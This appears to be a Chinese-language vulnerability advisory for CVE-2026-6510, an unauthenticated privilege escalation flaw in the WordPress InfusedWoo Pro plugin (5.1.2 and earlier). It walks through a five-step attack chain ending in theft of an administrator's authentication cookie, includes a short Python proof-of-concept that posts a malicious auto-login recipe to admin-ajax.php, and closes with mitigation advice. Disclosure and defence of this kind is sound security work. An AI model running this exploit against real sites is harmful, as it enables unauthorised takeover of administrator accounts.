CVE-2026-6510 CVSS 9.8 严重

CVE-2026-6510 WordPress InfusedWoo Pro权限提升漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6510

漏洞类型

权限提升

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

InfusedWoo Pro WordPress Plugin

漏洞概述

WordPress插件InfusedWoo Pro在5.1.2及之前版本存在严重的权限提升漏洞。由于AJAX处理函数`iwar_save_recipe()`缺少授权检查和nonce验证，未认证攻击者可创建恶意自动化配方，利用HTTP触发器获取任意用户（如管理员）的认证Cookie，实现完全的身份验证绕过。

技术细节

该漏洞源于InfusedWoo Pro插件中的`iwar_save_recipe()` AJAX处理函数未实施严格的访问控制机制。由于该函数缺少关键的nonce验证以及用户能力检查，任何未经身份验证的攻击者均可直接调用此接口。攻击者利用此缺陷，向`/wp-admin/admin-ajax.php`发送特制的POST请求，创建一个恶意的自动化“配方”。该配方巧妙地将HTTP POST请求设置为触发器，并将“自动登录”动作关联到目标管理员账户。一旦受害者被诱导访问攻击者预设的URL，服务器端将自动执行该配方，导致受害者的身份验证Cookie被发送给攻击者，从而实现身份验证绕过和权限提升。

攻击链分析

STEP 1

1. 漏洞发现

攻击者扫描目标网站，识别出使用了InfusedWoo Pro插件（版本<= 5.1.2）。

STEP 2

2. 创建恶意配方

攻击者向`/wp-admin/admin-ajax.php`发送POST请求，利用`iwar_save_recipe`函数创建包含HTTP触发器和自动登录动作的恶意配方，无需身份验证。

STEP 3

3. 诱导访问

攻击者生成特定的URL，并发送给目标管理员或其他具备权限的用户，诱导其点击访问。

STEP 4

4. 执行利用

当受害者访问该URL时，服务器端触发恶意配方，执行自动登录逻辑，将受害者的认证Cookie发送给攻击者。

STEP 5

5. 获取权限

攻击者利用获取到的Cookie通过身份验证，接管管理员账户，实现完全的站点控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "https://example.com/wp-admin/admin-ajax.php"

# Payload to create a malicious recipe
payload = {
    "action": "iwar_save_recipe",
    "recipe": {
        "trigger": {"type": "http_post"},
        "action": {"type": "auto_login", "user_id": 1} # Target admin (ID 1)
    }
}

# Send the request to create the recipe (No auth required)
response = requests.post(target_url, data=payload)

if response.status_code == 200:
    print("[+] Malicious recipe created successfully.")
    print("[+] Trigger the recipe by visiting the generated URL.")
else:
    print("[-] Failed to create recipe.")

影响范围

InfusedWoo Pro <= 5.1.2

防御指南

临时缓解措施

建议立即将InfusedWoo Pro插件升级到最新版本以修复此漏洞。如果无法立即升级，应暂时禁用该插件或通过服务器配置规则（如Apache mod_security或Nginx规则）拦截对`action=iwar_save_recipe`接口的未授权POST请求，防止攻击者创建恶意配方。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表